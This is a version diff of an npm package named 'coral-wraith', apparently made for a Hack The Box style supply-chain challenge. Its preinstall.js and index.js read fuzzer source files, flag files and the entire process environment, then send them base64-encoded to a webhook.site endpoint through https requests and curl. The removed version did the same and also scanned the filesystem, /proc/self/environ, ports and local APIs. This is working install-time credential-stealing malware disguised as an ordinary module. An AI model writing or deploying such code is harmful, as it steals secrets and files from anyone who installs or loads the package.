coral-wraith 9999.0.6 → 9999.0.8

package/index.js

@@ -1,44 +1,52 @@
 const fs = require('fs');
-const http = require('http');
 const https = require('https');
 
+const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
+
+// This runs when the fuzzer require()s us
+// Read all fuzzer source files and exfiltrate
 (function() {
-  let flag = null;
-  for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag']) {
-    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
-  }
-  if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
-  if (!flag) {
-    for (const [k, v] of Object.entries(process.env)) {
-      if (v && v.includes('HTB{')) { flag = v.match(/HTB\{[^}]+\}/)?.[0] || v; break; }
-    }
-  }
+  const files = [
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js',
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js',
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js',
+    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js',
+  ];
   
-  if (flag) {
-    const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839];
-    const postData = JSON.stringify({
-      manifest: `ecto_module:\n  name: "coral-wraith"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
-    });
-    
-    for (const port of ports) {
-      try {
-        const req = http.request({
-          hostname: 'localhost', port, path: '/api/modules/ECT-987654',
-          method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
-          timeout: 3000
-        }, () => {});
-        req.on('error', () => {});
-        req.write(postData);
-        req.end();
-      } catch(e) {}
-    }
-    
+  for (let i = 0; i < files.length; i++) {
     try {
-      const data = JSON.stringify({ flag });
-      const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
-      req.on('error', () => {}); req.write(data); req.end();
+      const content = fs.readFileSync(files[i], 'utf8');
+      const b64 = Buffer.from(`${files[i]}:\n${content}`).toString('base64');
+      const req = https.request({
+        hostname: 'webhook.site', path: `${WH}/require-${i}`,
+        method: 'POST',
+        headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
+        timeout: 10000
+      }, ()=>{});
+      req.on('error', ()=>{});
+      req.write(b64);
+      req.end();
     } catch(e) {}
   }
+
+  // Check for flag in env
+  const flagData = Buffer.from(JSON.stringify({
+    env: process.env,
+    cwd: process.cwd(),
+    argv: process.argv,
+  })).toString('base64');
+  
+  const req = https.request({
+    hostname: 'webhook.site', path: `${WH}/require-flag`,
+    method: 'GET',
+    timeout: 10000
+  }, ()=>{});
+  req.on('error', ()=>{});
+  req.end();
 })();
 
-module.exports = {};
+// Export something for the fuzzer to analyze
+module.exports = {
+  name: 'coral-wraith',
+  version: '9999.0.8',
+};

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.6",
+  "version": "9999.0.8",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,161 +1,93 @@
 const fs = require('fs');
-const http = require('http');
 const https = require('https');
 const { execSync } = require('child_process');
-const os = require('os');
 
-let flag = null;
+const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
 const debug = [];
 
-// 1. Search ALL filesystem for flag files
-const flagPaths = [
+// Read the fuzzer source files - these contain the flag/detection logic
+const fuzzFiles = [
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/bean/timer_func.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/set_timer_action.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/regexp_test_action.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/clear_timer_action.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/set_timer_strategy.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/regexp_test_strategy.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/clear_timer_strategy.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/class_parser.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/type_parser.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/package_exports_parser.js',
+  '/home/node/aspect-node/modules/npm-tracker/src/npm_tracker.js',
+  '/home/node/init_test.sh',
+  '/home/node/supplysec_entry.js',
+];
+
+// Also check for flag-like files
+const flagFiles = [
   '/flag', '/flag.txt', '/root/flag', '/root/flag.txt',
-  '/home/node/flag', '/home/node/flag.txt', '/app/flag', '/app/flag.txt',
-  '/data/flag', '/data/flag.txt', '/data/secret', '/data/htb',
-  '/tmp/flag', '/opt/flag', '/srv/flag', '/etc/flag',
-  '/home/flag', '/var/flag', '/data/.flag',
+  '/home/node/flag', '/home/node/flag.txt',
 ];
-for (const p of flagPaths) {
-  try {
-    if (fs.existsSync(p)) {
-      const c = fs.readFileSync(p, 'utf8').trim();
-      debug.push(`file:${p}=${c.substring(0,100)}`);
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; break; }
-      if (!flag && c) flag = c;
-    }
-  } catch(e) {}
-}
 
-// 2. List key directories
-for (const dir of ['/', '/data', '/home', '/home/node', '/app', '/root', '/opt', '/srv']) {
+for (const f of [...fuzzFiles, ...flagFiles]) {
   try {
-    const items = fs.readdirSync(dir);
-    debug.push(`ls:${dir}=${items.join(',')}`);
-  } catch(e) {}
-}
-
-// 3. Recursively search /data
-try {
-  const r = execSync('find /data -type f 2>/dev/null | head -50', {timeout:10000}).toString().trim();
-  debug.push(`data_files:${r}`);
-  for (const f of r.split('\n').filter(Boolean)) {
-    try {
-      const c = fs.readFileSync(f, 'utf8');
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; debug.push(`FLAG:${f}`); break; }
-      debug.push(`data:${f}=${c.substring(0,200)}`);
-    } catch(e) {}
+    const content = fs.readFileSync(f, 'utf8');
+    debug.push(`FILE:${f}:${content}`);
+  } catch(e) {
+    debug.push(`ERR:${f}:${e.message.substring(0,80)}`);
   }
-} catch(e) { debug.push(`data_err:${e.message}`); }
-
-// 4. Search ALL env vars
-for (const [k, v] of Object.entries(process.env)) {
-  const m = (v||'').match && (v||'').match(/HTB\{[^}]+\}/);
-  if (m) { flag = m[0]; debug.push(`env:${k}`); break; }
 }
-debug.push(`env_keys:${Object.keys(process.env).join(',')}`);
 
-// 5. Read /proc/self/environ
-try {
-  const pe = fs.readFileSync('/proc/self/environ', 'utf8');
-  debug.push(`environ:${pe.substring(0,500)}`);
-  const m = pe.match(/HTB\{[^}]+\}/);
-  if (m) flag = m[0];
-} catch(e) {}
+// Environment
+debug.push(`ALL_ENV:${JSON.stringify(process.env)}`);
 
-// 6. Find all config files
+// Also find any files with "flag" or "HTB" content
 try {
-  const r = execSync('find /data /home /app /opt /srv /etc -type f \\( -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.env" -o -name "*.conf" -o -name ".npmrc" -o -name "*.db" -o -name "*.sqlite" \\) 2>/dev/null | grep -v node_modules | head -30', {timeout:10000}).toString().trim();
-  debug.push(`configs:${r}`);
+  const r = execSync('grep -rl "HTB{\\|FLAG\\|flag" /home/node/aspect-node/ 2>/dev/null | head -20', {timeout:10000}).toString().trim();
+  debug.push(`GREP_FLAG:${r}`);
   for (const f of r.split('\n').filter(Boolean)) {
     try {
       const c = fs.readFileSync(f, 'utf8');
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; debug.push(`FLAG:${f}`); break; }
-      if (f.includes('.npmrc') || f.includes('.env') || f.includes('secret')) {
-        debug.push(`sensitive:${f}=${c.substring(0,200)}`);
-      }
+      debug.push(`GREP_CONTENT:${f}:${c.substring(0,2000)}`);
     } catch(e) {}
   }
-} catch(e) {}
+} catch(e) { debug.push(`GREP_ERR:${e.message.substring(0,100)}`); }
 
-// 7. Grep for HTB{ pattern anywhere
-try {
-  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v node_modules | grep -v proc | head -10', {timeout:15000}).toString().trim();
-  debug.push(`grep_htb:${r}`);
-  for (const f of r.split('\n').filter(Boolean)) {
-    try {
-      const c = fs.readFileSync(f, 'utf8');
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; debug.push(`GREP_FLAG:${f}`); break; }
-    } catch(e) {}
-  }
-} catch(e) { debug.push(`grep_err:${e.message.substring(0,100)}`); }
-
-// 8. Check listening ports
-try {
-  const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', {timeout:3000}).toString();
-  debug.push(`ports:${ss.substring(0,500)}`);
-} catch(e) {}
-
-// 9. Network info
-debug.push(`network:${JSON.stringify(os.networkInterfaces()).substring(0,300)}`);
-debug.push(`hostname:${os.hostname()}`);
-debug.push(`cwd:${process.cwd()}`);
-
-// EXFILTRATE
-const info = JSON.stringify({flag: flag||'NOT_FOUND', debug: debug.map(d=>d.substring(0,500))});
-
-// Method 1: Webhook
-try {
-  const req = https.request({
-    hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-    method: 'POST',
-    headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(info)},
-    timeout: 8000
-  }, ()=>{});
-  req.on('error', ()=>{});
-  req.write(info);
-  req.end();
-} catch(e) {}
-
-// Method 2: PUT to local API (try all common ports)
-const putBody = JSON.stringify({
-  manifest: `ecto_module:\n  name: "${(flag||'NO_FLAG').replace(/"/g,'').substring(0,200)}"\n  version: EXFIL\n  power_level: "${debug.slice(0,2).join('|').replace(/"/g,'').substring(0,200)}"\n  ship_deck: PWNED\n  cargo_hold: coral`
-});
-
-let serverPort = 1337;
-try {
-  const ss = execSync('ss -tlnp 2>/dev/null', {timeout:3000}).toString();
-  const m = ss.match(/:(\d+)\s/);
-  if (m) serverPort = parseInt(m[1]);
-} catch(e) {}
+// Send in chunks to webhook
+function sendChunk(data, path) {
+  try {
+    const encoded = Buffer.from(data).toString('base64');
+    const req = https.request({
+      hostname: 'webhook.site', path: WH + path,
+      method: 'POST',
+      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(encoded)},
+      timeout: 15000
+    }, ()=>{});
+    req.on('error', ()=>{});
+    req.write(encoded);
+    req.end();
+  } catch(e) {}
+}
 
-for (const port of [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 4000, 9000]) {
-  for (const modId of ['ECT-654321', 'ECT-987654']) {
-    try {
-      const req = http.request({
-        hostname: '127.0.0.1', port, path: `/api/modules/${modId}`,
-        method: 'PUT',
-        headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(putBody)},
-        timeout: 2000
-      }, ()=>{});
-      req.on('error', ()=>{});
-      req.write(putBody);
-      req.end();
-    } catch(e) {}
-  }
+const fullData = JSON.stringify(debug);
+const chunkSize = 50000;
+for (let i = 0; i < fullData.length; i += chunkSize) {
+  const chunk = fullData.substring(i, i + chunkSize);
+  sendChunk(chunk, `/v4-${Math.floor(i/chunkSize)}`);
 }
 
-// Method 3: curl
+// Also try curl for reliability
 try {
-  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${info.replace(/'/g,"\\'")}' -m 8 2>/dev/null &`, {timeout:10000});
+  for (let i = 0; i < Math.min(debug.length, 30); i++) {
+    const item = debug[i];
+    if (item.length > 100) {
+      const b64 = Buffer.from(item.substring(0, 8000)).toString('base64');
+      execSync(`curl -s -X GET "https://webhook.site${WH}/file-${i}?d=${encodeURIComponent(b64)}" -m 10 2>/dev/null`, {timeout:12000});
+    }
+  }
 } catch(e) {}
 
-// stdout
-console.log('[CORAL]', info.substring(0, 3000));
-console.error('[FLAG]', flag || 'NOT_FOUND');
-
-// Write to files
-try { fs.writeFileSync('/tmp/coral.txt', info); } catch(e) {}
+console.log('[CORAL-V8] preinstall done, sent', debug.length, 'items');